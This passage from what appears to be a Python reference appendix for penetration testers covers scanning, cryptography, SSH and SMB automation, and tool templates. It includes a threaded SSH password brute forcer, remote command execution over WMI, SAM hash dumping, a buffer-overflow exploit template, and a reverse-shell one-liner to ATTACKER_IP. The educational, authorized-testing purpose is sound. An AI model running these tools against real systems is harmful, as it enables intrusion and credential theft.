                "state": port_el.find("state").get("state"),
                "service": _service_attr(svc, "name"),
                "product": _service_attr(svc, "product"),
                "version": _service_attr(svc, "version"),
            }
            # Extract script output
            script_output = {
                item.get("id"): item.get("output")
                for item in port_el.findall("script")
            }
            if script_output:
                record["scripts"] = script_output
            entry["ports"].append(record)
        parsed_hosts.append(entry)
    return parsed_hosts
# Parse SAML assertions (for security testing)
def extract_saml_attributes(saml_response_xml):
    """Return ``{attribute name: [values]}`` from a SAML Response document.

    Every ``saml:Attribute`` element anywhere in the document is
    collected; when a name occurs more than once, the last occurrence wins.
    """
    ns = {
        "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
        "samlp": "urn:oasis:names:tc:SAML:2.0:protocol"
    }
    document = ET.fromstring(saml_response_xml)
    return {
        node.get("Name"): [
            value.text for value in node.findall("saml:AttributeValue", ns)
        ]
        for node in document.findall(".//saml:Attribute", ns)
    }
10. Cryptography Library
Hashing
import hashlib
def hash_string(text, algorithm="sha256"):
    """Return the hex digest of ``text`` under the named hashlib algorithm."""
    encoded = text.encode()
    return hashlib.new(algorithm, encoded).hexdigest()
def hash_file(filepath, algorithm="sha256"):
    """Return the hex digest of a file, read in 8 KiB chunks."""
    digest = hashlib.new(algorithm)
    with open(filepath, "rb") as handle:
        # iter() with a sentinel stops at the first empty read (EOF).
        for block in iter(lambda: handle.read(8192), b""):
            digest.update(block)
    return digest.hexdigest()
# Common hash types
text = "password123"
print(f"MD5: {hash_string(text, 'md5')}")
print(f"SHA1: {hash_string(text, 'sha1')}")
print(f"SHA256: {hash_string(text, 'sha256')}")
print(f"SHA512: {hash_string(text, 'sha512')}")
AES Encryption/Decryption
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
import base64
def aes_encrypt(plaintext, key):
    """Encrypt text with AES in CBC mode under a fresh random IV.

    Returns Base64 text of ``IV || ciphertext``. The key length selects the
    AES variant (a 32-byte key gives AES-256). CBC provides no integrity
    protection on its own.
    """
    iv = get_random_bytes(16)
    padded = pad(plaintext.encode(), AES.block_size)
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    blob = iv + encryptor.encrypt(padded)
    return base64.b64encode(blob).decode()
def aes_decrypt(encrypted_b64, key):
    """Reverse ``aes_encrypt``: Base64-decode, split off the IV, decrypt.

    The first 16 bytes of the decoded blob are the IV; the rest is the
    CBC ciphertext. Returns the unpadded plaintext as text.
    """
    blob = base64.b64decode(encrypted_b64)
    iv, body = blob[:16], blob[16:]
    decryptor = AES.new(key, AES.MODE_CBC, iv)
    padded = decryptor.decrypt(body)
    return unpad(padded, AES.block_size).decode()
# Usage
key = get_random_bytes(32) # 256-bit key
encrypted = aes_encrypt("Sensitive data here", key)
decrypted = aes_decrypt(encrypted, key)
print(f"Encrypted: {encrypted}")
print(f"Decrypted: {decrypted}")
RSA Key Generation and Usage
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
# Generate RSA key pair
key = RSA.generate(2048)
private_key = key.export_key()
public_key = key.publickey().export_key()
# Encrypt with public key
def rsa_encrypt(plaintext, pub_key_pem):
    """Encrypt text with RSA-OAEP under a PEM-encoded public key."""
    recipient_key = RSA.import_key(pub_key_pem)
    oaep = PKCS1_OAEP.new(recipient_key)
    message = plaintext.encode()
    return oaep.encrypt(message)
# Decrypt with private key
def rsa_decrypt(ciphertext, priv_key_pem):
    """Decrypt RSA-OAEP ciphertext with a PEM-encoded private key; return text."""
    own_key = RSA.import_key(priv_key_pem)
    oaep = PKCS1_OAEP.new(own_key)
    recovered = oaep.decrypt(ciphertext)
    return recovered.decode()
# Sign and verify
def sign_data(data, priv_key_pem):
    """Sign the SHA-256 digest of ``data`` with PKCS#1 v1.5; return the signature bytes."""
    signing_key = RSA.import_key(priv_key_pem)
    digest = SHA256.new(data.encode())
    return pkcs1_15.new(signing_key).sign(digest)
def verify_signature(data, signature, pub_key_pem):
    """Return True if ``signature`` is valid for ``data`` under the public key.

    Verification failures (``ValueError`` / ``TypeError``) are reported as
    ``False`` rather than raised.
    """
    verifying_key = RSA.import_key(pub_key_pem)
    digest = SHA256.new(data.encode())
    try:
        pkcs1_15.new(verifying_key).verify(digest, signature)
    except (ValueError, TypeError):
        return False
    else:
        return True
Password Hashing (bcrypt)
import bcrypt
def hash_password(password):
    """Return the bcrypt hash (bytes) of ``password`` using a 12-round salt."""
    secret = password.encode()
    return bcrypt.hashpw(secret, bcrypt.gensalt(rounds=12))
def verify_password(password, hashed):
    """Return True if ``password`` matches the bcrypt hash ``hashed``."""
    candidate = password.encode()
    return bcrypt.checkpw(candidate, hashed)
# Usage
hashed = hash_password("my_secure_password")
print(f"Hash: {hashed.decode()}")
print(f"Valid: {verify_password('my_secure_password', hashed)}")
print(f"Invalid: {verify_password('wrong_password', hashed)}")
11. Paramiko — SSH Automation
SSH Command Execution
import paramiko
def ssh_execute(hostname, username, password=None, key_file=None,
                command="id", port=22):
    """Run one command over SSH and collect its output.

    Authenticates with ``key_file`` when given, otherwise with
    ``password``. Unknown host keys are accepted automatically.

    Returns:
        ``{"stdout", "stderr", "exit_code"}`` on success, or
        ``{"error": message}`` when connecting or executing fails.
    """
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        connect_kwargs = {
            "hostname": hostname,
            "port": port,
            "username": username,
            "timeout": 10,
        }
        # Exactly one credential is passed: the key file wins when supplied.
        credential = (("key_filename", key_file) if key_file
                      else ("password", password))
        connect_kwargs[credential[0]] = credential[1]

        ssh.connect(**connect_kwargs)
        stdin, stdout, stderr = ssh.exec_command(command)
        out_text = stdout.read().decode()
        err_text = stderr.read().decode()
        status = stdout.channel.recv_exit_status()
        return {"stdout": out_text, "stderr": err_text, "exit_code": status}
    except paramiko.AuthenticationException:
        return {"error": "Authentication failed"}
    except paramiko.SSHException as e:
        return {"error": f"SSH error: {e}"}
    except Exception as e:
        return {"error": f"Connection error: {e}"}
    finally:
        ssh.close()
# Usage
result = ssh_execute("192.168.1.10", "admin", password="admin123",
                     command="uname -a")
# On failure ssh_execute() returns {"error": ...} with no "stdout" key.
if "error" in result:
    print(f"[!] {result['error']}")
else:
    print(result["stdout"])
SSH Brute Forcer
import paramiko
import threading
from queue import Queue
def ssh_brute(hostname, username, wordlist_path, port=22, threads=5):
    """Try each password from a wordlist against one SSH account.

    For authorised credential audits only. A successful login is printed;
    this function itself always returns ``None``.
    """
    found = threading.Event()
    password_queue = Queue()
    with open(wordlist_path) as wordlist:
        for entry in wordlist:
            password_queue.put(entry.strip())

    def try_login():
        # Stop as soon as the queue drains or any worker has succeeded.
        while not password_queue.empty() and not found.is_set():
            candidate = password_queue.get()
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            try:
                ssh.connect(hostname, port=port, username=username,
                            password=candidate, timeout=3,
                            banner_timeout=3, auth_timeout=3)
                found.set()
                print(f"[+] FOUND: {username}:{candidate}")
                ssh.close()
                return candidate
            except paramiko.AuthenticationException:
                pass  # Wrong password
            except Exception:
                pass  # Connection error
            finally:
                password_queue.task_done()

    workers = []
    for _ in range(threads):
        worker = threading.Thread(target=try_login)
        worker.daemon = True
        worker.start()
        workers.append(worker)
    password_queue.join()
    return None
SFTP File Operations
import paramiko
def sftp_operations(hostname, username, password, port=22):
    """Demonstrate SFTP file operations.

    Lists ``/tmp``, downloads ``/etc/passwd``, uploads ``local_script.sh``
    and reads ``/etc/hostname`` from the remote host. The SFTP client and
    the transport are closed on every exit path.
    """
    transport = paramiko.Transport((hostname, port))
    try:
        # connect() and from_transport() sit inside the try so a failed
        # login or channel setup still closes the transport.
        transport.connect(username=username, password=password)
        sftp = paramiko.SFTPClient.from_transport(transport)
        try:
            # List directory
            files = sftp.listdir("/tmp")
            print(f"Files in /tmp: {files[:10]}")
            # Download file
            sftp.get("/etc/passwd", "downloaded_passwd.txt")
            # Upload file
            sftp.put("local_script.sh", "/tmp/uploaded_script.sh")
            # Read file content
            with sftp.open("/etc/hostname", "r") as f:
                hostname_content = f.read().decode()
            print(f"Hostname: {hostname_content.strip()}")
        finally:
            sftp.close()
    finally:
        transport.close()
12. Impacket Basics
SMB Enumeration
from impacket.smbconnection import SMBConnection
def smb_enumerate(target, username="", password="", domain=""):
    """Print basic server information and the share list of an SMB host.

    Logs in with the given credentials, or with an empty user/password
    (null session) when ``username`` is empty. For each share, up to five
    directory entries are listed, or ``[Access Denied]`` if listing fails.
    Any error is printed rather than raised.
    """
    try:
        conn = SMBConnection(target, target, sess_port=445)
        # Null session when no user name is supplied.
        login_args = (username, password, domain) if username else ("", "")
        conn.login(*login_args)

        print(f"[*] OS: {conn.getServerOS()}")
        print(f"[*] Domain: {conn.getServerDomain()}")
        print(f"[*] Hostname: {conn.getServerName()}")

        # List shares
        print(f"\n[*] Shares:")
        for entry in conn.listShares():
            name = entry["shi1_netname"][:-1]  # Remove null byte
            comment = entry["shi1_remark"][:-1]
            print(f" {name:<20} {comment}")
            # Try to list files in share
            try:
                for item in conn.listPath(name, "*")[:5]:
                    print(f" -> {item.get_longname()}")
            except Exception:
                print(f" -> [Access Denied]")
        conn.logoff()
    except Exception as e:
        print(f"[!] Error: {e}")
Executing Commands via WMI
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEM_FLAG_FORWARD_ONLY
import impacket.dcerpc.v5.dcom.wmi as wmi
def wmi_exec(target, username, password, domain, command):
    """Start ``command`` on a remote Windows host through WMI.

    For authorised administration and testing only. Creates the process
    via ``Win32_Process.Create`` with ``C:\\`` as working directory; errors
    are printed rather than raised.
    """
    try:
        dcom = DCOMConnection(target, username, password, domain)
        login_iface = dcom.CoCreateInstanceEx(
            wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login
        )
        wbem_login = wmi.IWbemLevel1Login(login_iface)
        services = wbem_login.NTLMLogin("//./root/cimv2", None, None)
        wbem_login.RemRelease()

        process_class, _ = services.GetObject("Win32_Process")
        process_class.Create(command, "C:\\", None)
        print(f"[+] Command executed on {target}: {command}")
        dcom.disconnect()
    except Exception as e:
        print(f"[!] WMI exec failed: {e}")
Secretsdump (Hash Extraction)
# Impacket's secretsdump functionality (conceptual usage)
# In practice, use the command-line tool:
# secretsdump.py domain/user:password@target
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
def dump_sam(target, username, password, domain=""):
    """Dump SAM hashes from a remote Windows host into ``sam_hashes.txt``.

    For authorised assessments only. Errors are printed rather than raised.
    """
    try:
        from impacket.smbconnection import SMBConnection

        smb = SMBConnection(target, target)
        smb.login(username, password, domain)

        ops = RemoteOperations(smb, False)
        ops.enableRegistry()

        # NOTE(review): reads a name-mangled private attribute of
        # RemoteOperations; confirm it is populated at this point for the
        # installed impacket version.
        hashes = SAMHashes(
            ops.saveSAM(),
            ops._RemoteOperations__bootKey,
            isRemote=True
        )
        hashes.dump()
        hashes.export("sam_hashes.txt")

        ops.finish()
        smb.logoff()
    except Exception as e:
        print(f"[!] Error: {e}")
13. Multithreading and Concurrency
Thread Pool Pattern
from concurrent.futures import ThreadPoolExecutor, as_completed
import threading
def scan_target(target):
    """Placeholder scan: report every target as open.

    Replace the body with real scanning logic.
    """
    # ... scanning logic ...
    outcome = {"target": target, "status": "open"}
    return outcome
def parallel_scan(targets, max_workers=50):
    """Run ``scan_target`` over many targets on a thread pool.

    Args:
        targets: Iterable of targets handed to ``scan_target``.
        max_workers: Thread pool size.

    Returns:
        The results in completion order. A target whose scan raises is
        reported on stdout and left out of the list.
    """
    results = []
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        future_to_target = {
            executor.submit(scan_target, target): target
            for target in targets
        }
        # Results are gathered on the calling thread only, so no lock is
        # needed; as_completed() yields finished futures, so result()
        # returns immediately and needs no timeout.
        for future in as_completed(future_to_target):
            target = future_to_target[future]
            try:
                results.append(future.result())
            except Exception as e:
                print(f"[!] {target}: {e}")
    return results
Async Pattern (for high-volume I/O)
import asyncio
import aiohttp
async def async_check_url(session, url):
    """Fetch one URL and summarise the response.

    Returns ``{"url", "status", "size"}`` where ``size`` is the length of
    the decoded body, or ``{"url", "error"}`` if anything goes wrong. TLS
    verification is disabled and the total timeout is 5 seconds.
    """
    limit = aiohttp.ClientTimeout(total=5)
    try:
        async with session.get(url, timeout=limit, ssl=False) as resp:
            status = resp.status
            body = await resp.text()
            return {"url": url, "status": status, "size": len(body)}
    except Exception as e:
        return {"url": url, "error": str(e)}
async def async_url_checker(urls, concurrency=50):
    """Check many URLs concurrently, at most ``concurrency`` at a time.

    Returns:
        List of per-URL result dicts from ``async_check_url``, in the same
        order as ``urls``.
    """
    gate = asyncio.Semaphore(concurrency)

    async def bounded_check(session, url):
        # Hold a semaphore slot for the duration of the request.
        async with gate:
            return await async_check_url(session, url)

    async with aiohttp.ClientSession() as session:
        return await asyncio.gather(
            *(bounded_check(session, url) for url in urls)
        )
# Usage
# urls = ["http://target.com/page1", "http://target.com/page2", ...]
# results = asyncio.run(async_url_checker(urls))
Rate-Limited Scanner
import threading
import time
class RateLimiter:
    """Thread-safe token-bucket rate limiter.

    The bucket refills at ``rate_per_second`` tokens per second and starts
    full. Each successful ``acquire()`` consumes one token.
    """

    def __init__(self, rate_per_second):
        """Create a limiter.

        Args:
            rate_per_second: Sustained number of permits per second; may
                be fractional (e.g. 0.5 for one permit every two seconds).

        Raises:
            ValueError: If ``rate_per_second`` is not positive (such a
                limiter could never grant a permit).
        """
        if rate_per_second <= 0:
            raise ValueError("rate_per_second must be positive")
        self.rate = rate_per_second
        # The bucket must hold at least one whole token, otherwise rates
        # below 1/s could never accumulate enough to grant a permit.
        self.capacity = max(1, rate_per_second)
        self.tokens = self.capacity
        self.lock = threading.Lock()
        # Monotonic clock: immune to wall-clock adjustments (NTP, DST).
        self.last_time = time.monotonic()

    def acquire(self):
        """Try to take one token without blocking.

        Returns:
            True if a token was consumed, False if the bucket is empty.
        """
        with self.lock:
            now = time.monotonic()
            elapsed = now - self.last_time
            self.tokens = min(self.capacity, self.tokens + elapsed * self.rate)
            self.last_time = now
            if self.tokens >= 1:
                self.tokens -= 1
                return True
            return False

    def wait(self):
        """Block (polling every 10 ms) until a token has been acquired."""
        while not self.acquire():
            time.sleep(0.01)
# Usage with scanning
# Module-level limiter shared by every caller: 100 requests/second
limiter = RateLimiter(100)


def rate_limited_scan(target):
    """Scan ``target`` after waiting for a permit from the shared limiter."""
    limiter.wait()
    # ... perform scan ...
14. Error Handling Patterns
Robust Network Error Handling
import socket
import requests
import time
import functools
def retry(max_attempts=3, delay=1, backoff=2, exceptions=(Exception,)):
    """Decorator for retrying functions with exponential backoff.

    Args:
        max_attempts: Total number of calls to make before giving up.
        delay: Seconds to sleep before the first retry.
        backoff: Factor applied to the delay after every retry.
        exceptions: Exception types that trigger a retry; anything else
            propagates immediately.

    Returns:
        A decorator. The wrapped function returns the first successful
        result, or re-raises the last exception once attempts run out.

    Raises:
        ValueError: If ``max_attempts`` is less than 1 (the wrapped
            function would otherwise never be called).
    """
    if max_attempts < 1:
        raise ValueError("max_attempts must be at least 1")

    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            current_delay = delay
            for attempt in range(1, max_attempts + 1):
                try:
                    return func(*args, **kwargs)
                except exceptions as e:
                    if attempt == max_attempts:
                        # Out of attempts: surface the original error.
                        raise
                    print(f"[*] Retry {attempt}/{max_attempts} "
                          f"after {current_delay}s: {e}")
                    time.sleep(current_delay)
                    current_delay *= backoff
        return wrapper
    return decorator
@retry(max_attempts=3, delay=1,
       exceptions=(requests.ConnectionError, requests.Timeout))
def resilient_request(url):
    """GET ``url`` with a 5-second timeout.

    Connection errors and timeouts are retried by the ``retry`` decorator
    (up to 3 attempts in total).
    """
    response = requests.get(url, timeout=5)
    return response
# Comprehensive network error handling
def safe_connect(target, port, timeout=3):
    """Open a TCP connection, reporting failures instead of raising.

    Args:
        target: Host name or IPv4 address to connect to.
        port: TCP port number.
        timeout: Socket timeout in seconds.

    Returns:
        The connected socket (the caller must close it), or None if the
        connection could not be established. The reason is printed.
    """
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((target, port))
        return sock
    # Specific OSError subclasses first; the generic handler comes last.
    except socket.timeout:
        print(f"[-] {target}:{port} — Connection timed out")
    except ConnectionRefusedError:
        print(f"[-] {target}:{port} — Connection refused")
    except socket.gaierror:
        print(f"[-] {target} — DNS resolution failed")
    except PermissionError:
        print(f"[-] {target}:{port} — Permission denied (firewall?)")
    except OSError as e:
        print(f"[-] {target}:{port} — OS error: {e}")
    # Only reached on failure: release the descriptor rather than leaking
    # one socket per unreachable target.
    if sock is not None:
        sock.close()
    return None
15. Output Formatting and Logging
Colored Terminal Output
from colorama import Fore, Style, init
init(autoreset=True) # Auto-reset colors after each print
def _print_tagged(tag_color, tag, msg):
    """Print ``msg`` behind a colored status tag such as ``[+]``."""
    print(f"{tag_color}{tag}{Style.RESET_ALL} {msg}")


def print_success(msg):
    """Print ``msg`` with a green ``[+]`` prefix."""
    _print_tagged(Fore.GREEN, "[+]", msg)


def print_error(msg):
    """Print ``msg`` with a red ``[-]`` prefix."""
    _print_tagged(Fore.RED, "[-]", msg)


def print_info(msg):
    """Print ``msg`` with a blue ``[*]`` prefix."""
    _print_tagged(Fore.BLUE, "[*]", msg)


def print_warning(msg):
    """Print ``msg`` with a yellow ``[!]`` prefix."""
    _print_tagged(Fore.YELLOW, "[!]", msg)


def print_banner(tool_name, version="1.0"):
    """Print a cyan banner: tool name and version between two rules."""
    rule = "=" * 50
    banner = (
        f"\n{Fore.CYAN}{rule}\n"
        f"{tool_name} v{version}\n"
        f"{rule}{Style.RESET_ALL}\n"
    )
    print(banner)
Structured Logging
import logging
from datetime import datetime
def setup_logger(name, log_file=None, level=logging.INFO):
    """Configure logging for security tools.

    Safe to call repeatedly: handlers are attached only once per logger,
    so a second call with the same arguments does not duplicate output.

    Args:
        name: Logger name passed to ``logging.getLogger``.
        log_file: Optional path; when given, records are also written to
            this file (UTF-8).
        level: Minimum level the logger emits.

    Returns:
        The configured ``logging.Logger``.
    """
    import os  # local import: only needed to normalise the log path

    logger = logging.getLogger(name)
    logger.setLevel(level)
    formatter = logging.Formatter(
        "%(asctime)s | %(levelname)-8s | %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S"
    )

    # Console handler. FileHandler subclasses StreamHandler, so it must be
    # excluded when checking whether a console handler already exists.
    has_console = any(
        isinstance(h, logging.StreamHandler)
        and not isinstance(h, logging.FileHandler)
        for h in logger.handlers
    )
    if not has_console:
        console = logging.StreamHandler()
        console.setFormatter(formatter)
        logger.addHandler(console)

    # File handler (optional)
    if log_file:
        # FileHandler stores the absolute path in baseFilename.
        wanted_path = os.path.abspath(os.fspath(log_file))
        has_file = any(
            isinstance(h, logging.FileHandler)
            and h.baseFilename == wanted_path
            for h in logger.handlers
        )
        if not has_file:
            file_handler = logging.FileHandler(log_file, encoding="utf-8")
            file_handler.setFormatter(formatter)
            logger.addHandler(file_handler)
    return logger
# Usage
# Logger that writes to the console and to scan_results.log
# (the file path is handed to logging.FileHandler by setup_logger).
log = setup_logger("scanner", "scan_results.log")
# One example per severity level; each call emits a formatted record.
log.info("Starting scan against 192.168.1.0/24")
log.warning("Port 445 (SMB) is open — check for EternalBlue")
log.error("Connection to 192.168.1.50 failed")
Table Output
from tabulate import tabulate
def display_results(results):
    """Print scan results as a grid-formatted table.

    Args:
        results: Iterable of dicts, each providing the keys ``host``,
            ``port``, ``state``, ``service`` and ``version``.
    """
    columns = ("host", "port", "state", "service", "version")
    headers = ["Host", "Port", "State", "Service", "Version"]
    rows = [[entry[column] for column in columns] for entry in results]
    print(tabulate(rows, headers=headers, tablefmt="grid"))
# Example output:
# +---------------+------+-------+----------+-----------+
# | Host          | Port | State | Service  | Version   |
# +===============+======+=======+==========+===========+
# | 192.168.1.10  |   22 | open  | ssh      | OpenSSH 8 |
# | 192.168.1.10  |   80 | open  | http     | Apache 2  |
# | 192.168.1.10  |  443 | open  | https    | nginx 1.2 |
# +---------------+------+-------+----------+-----------+
16. Common Security Script Patterns
Complete Tool Template
#!/usr/bin/env python3
"""
PortHunter — Fast TCP Port Scanner
Author: Security Student
Usage: python3 porthunter.py -t TARGET -p PORTS [options]
"""
import argparse
import socket
import sys
import time
import threading
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
try:
    from colorama import Fore, Style, init
    init(autoreset=True)
    HAS_COLOR = True
except ImportError:
    HAS_COLOR = False

    class _NoColor:
        """Stand-in for colorama's ``Fore``/``Style``: every code is ''."""

        def __getattr__(self, name):
            return ""

    # Call sites evaluate Fore.X / Style.X before checking HAS_COLOR, so
    # the names must exist even when colorama is not installed.
    Fore = Style = _NoColor()
# --- Configuration ---
VERSION = "1.0.0"
DEFAULT_TIMEOUT = 1.0
DEFAULT_THREADS = 100
# --- Helper Functions ---
def color(text, color_code):
    """Wrap ``text`` in ``color_code`` plus a reset when color is available.

    Returns ``text`` unchanged when ``HAS_COLOR`` is false.
    """
    if not HAS_COLOR:
        return text
    return f"{color_code}{text}{Style.RESET_ALL}"
def banner():
    """Print the tool name/version line and a rule, both in cyan."""
    title = f"\n PortHunter v{VERSION}"
    rule = " " + "─" * 30 + "\n"
    for line in (title, rule):
        print(color(line, Fore.CYAN))
def parse_ports(spec):
    """Parse a port specification into a sorted list of unique ports.

    Args:
        spec: Comma-separated ports and inclusive ranges, for example
            ``"22,80,8000-8010"``. Whitespace around items and empty items
            (such as a trailing comma) are ignored.

    Returns:
        Sorted list of distinct port numbers.

    Raises:
        ValueError: If an item is not a number or ``start-end`` range, a
            port is outside 1-65535, a range is reversed, or no port is
            given at all.
    """
    ports = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue  # tolerate stray commas such as "80,"
        try:
            if "-" in part:
                start, end = (int(bound) for bound in part.split("-"))
            else:
                start = end = int(part)
        except ValueError:
            raise ValueError(f"invalid port specification: {part!r}") from None
        if not 1 <= start <= end <= 65535:
            raise ValueError(
                f"ports must be within 1-65535 and ranges ascending: {part!r}"
            )
        ports.update(range(start, end + 1))
    if not ports:
        raise ValueError("no ports specified")
    return sorted(ports)
# --- Core Logic ---
def scan_port(target, port, timeout):
    """Probe one TCP port and try to read a service banner.

    Args:
        target: Host name or IPv4 address.
        port: TCP port to probe.
        timeout: Socket timeout in seconds for connect and banner read.

    Returns:
        ``{"port", "state": "open", "banner"}`` when the connection
        succeeds (``banner`` is '' if nothing could be read), otherwise
        None.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((target, port)) != 0:
                return None
            try:
                # Nudge services that only answer after receiving input.
                s.send(b"\r\n")
                banner_text = s.recv(1024).decode(errors="replace").strip()
            except OSError:
                # Includes socket.timeout: the port is open but silent.
                banner_text = ""
            return {"port": port, "state": "open", "banner": banner_text}
    except (OSError, OverflowError):
        # OSError: resolution/socket failures; OverflowError: port number
        # outside 0-65535. KeyboardInterrupt/SystemExit are deliberately
        # NOT caught so Ctrl-C can stop a scan.
        return None
def main():
    """Command-line entry point: parse arguments, scan, report.

    Resolves the target, scans the requested ports in a thread pool,
    prints each open port as it is found and, with ``-o``, writes a JSON
    report. Invalid arguments end the program with a usage error (exit
    status 2); an unresolvable target exits with status 1.
    """
    parser = argparse.ArgumentParser(description="Fast TCP Port Scanner")
    parser.add_argument("-t", "--target", required=True, help="Target host")
    parser.add_argument("-p", "--ports", default="1-1024", help="Port spec")
    parser.add_argument("--threads", type=int, default=DEFAULT_THREADS)
    parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    parser.add_argument("-o", "--output", help="Output JSON file")
    parser.add_argument("-q", "--quiet", action="store_true")
    args = parser.parse_args()

    # Reject unusable values up front with a usage message rather than a
    # traceback (thread pool) or a scan that silently finds nothing.
    if args.threads < 1:
        parser.error("--threads must be at least 1")
    if args.timeout <= 0:
        parser.error("--timeout must be greater than 0")

    if not args.quiet:
        banner()

    target = args.target
    try:
        ports = parse_ports(args.ports)
    except ValueError as e:
        parser.error(f"invalid port specification {args.ports!r}: {e}")

    # Resolve hostname
    try:
        target_ip = socket.gethostbyname(target)
    except socket.gaierror:
        print(color(f"[-] Cannot resolve: {target}", Fore.RED))
        sys.exit(1)

    print(f"[*] Scanning {target} ({target_ip}) — {len(ports)} ports")
    start_time = time.time()
    results = []
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = [
            executor.submit(scan_port, target_ip, port, args.timeout)
            for port in ports
        ]
        # Report open ports as soon as each probe finishes.
        for future in as_completed(futures):
            result = future.result()
            if result:
                results.append(result)
                port = result["port"]
                banner_text = result["banner"][:60] if result["banner"] else ""
                print(color(f" [+] {port:>5}/tcp open {banner_text}", Fore.GREEN))

    elapsed = time.time() - start_time
    results.sort(key=lambda x: x["port"])
    print(f"\n[*] Scan complete: {len(results)} open ports "
          f"found in {elapsed:.2f}s")

    if args.output:
        output_data = {
            "target": target,
            "ip": target_ip,
            "scan_date": datetime.now().isoformat(),
            "ports_scanned": len(ports),
            "results": results,
            "elapsed_seconds": round(elapsed, 2)
        }
        with open(args.output, "w", encoding="utf-8") as f:
            json.dump(output_data, f, indent=2)
        print(f"[*] Results saved to {args.output}")


if __name__ == "__main__":
    main()
Credential Checker Pattern
def credential_checker(target, service, cred_list):
    """Generic credential checking pattern (authorized testing only).

    Args:
        target: Host to authenticate against.
        service: One of ``"ssh"``, ``"ftp"`` or ``"http"``.
        cred_list: Iterable of ``(username, password)`` pairs.

    Returns:
        The first ``(username, password)`` pair that the service helper
        reports as successful, or None if none succeeds.

    Raises:
        ValueError: If ``service`` is not supported. Previously this case
            failed silently on every pair and returned None.
    """
    if service not in ("ssh", "ftp", "http"):
        raise ValueError(f"unsupported service: {service!r}")

    for username, password in cred_list:
        try:
            if service == "ssh":
                success = try_ssh(target, username, password)
            elif service == "ftp":
                success = try_ftp(target, username, password)
            else:
                success = try_http_login(target, username, password)
        except Exception:
            # Best effort: a failed attempt (network error, rejection
            # raised by the helper) just moves on to the next pair.
            continue
        if success:
            return (username, password)
    return None
Exploit Development Pattern
import struct
import socket
def build_exploit(target_ip, target_port, shellcode):
    """Generic buffer overflow exploit template (authorized lab use only).

    Builds ``padding + return address + NOP sled + shellcode`` and sends
    it over a single TCP connection. The offset and return address are
    placeholders that must be determined for the specific lab target.

    Args:
        target_ip: Address of the target service.
        target_port: TCP port of the target service.
        shellcode: Payload bytes appended after the NOP sled.

    Returns:
        None. Success or failure is reported on stdout.
    """
    # Build the payload
    offset = 1024  # Offset to EIP (found via fuzzing)
    eip = struct.pack("<I", 0x625011AF)  # JMP ESP address
    nop_sled = b"\x90" * 16
    payload = b"".join((b"A" * offset, eip, nop_sled, shellcode))

    # Send the payload
    try:
        # The context manager closes the socket even when connect/send
        # fails; sendall() guarantees the whole payload is written.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((target_ip, target_port))
            sock.sendall(payload)
        print("[+] Exploit sent!")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
Quick Reference: Common One-Liners
# Reverse shell (netcat-style) — for authorized testing only
import os; os.system("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1")
# Quick HTTP server for file transfer
# python3 -m http.server 8080
# Base64 encode/decode
# b64encode() returns bytes; .decode() turns them into a str for printing
# or embedding. b64decode() gives back the original bytes.
import base64
encoded = base64.b64encode(b"payload data").decode()
decoded = base64.b64decode(encoded)
# URL encode/decode
# quote() percent-encodes reserved characters; unquote() reverses it.
# NOTE: these reuse the names `encoded`/`decoded` from the Base64 example.
from urllib.parse import quote, unquote
encoded = quote("param=value&foo=bar <script>")
decoded = unquote(encoded)
# Generate random strings (for tokens, filenames)
# `secrets` draws from the OS CSPRNG; the argument is the number of
# random bytes, not the length of the resulting string.
import secrets
token = secrets.token_hex(16) # 32-char hex string
url_token = secrets.token_urlsafe(16) # URL-safe string
# IP address manipulation
# hosts() iterates the usable addresses of the network.
import ipaddress
network = ipaddress.ip_network("192.168.1.0/24")
hosts = list(network.hosts()) # All usable host IPs
# Timestamp conversion
# Without a tz argument, fromtimestamp() returns a naive datetime in the
# machine's local time zone.
from datetime import datetime
ts = datetime.fromtimestamp(1700000000) # Unix -> datetime
unix_ts = int(datetime.now().timestamp()) # datetime -> Unix
All code in this appendix is provided for educational purposes in authorized penetration testing and security research only. Always ensure you have proper written authorization before testing any system you do not own.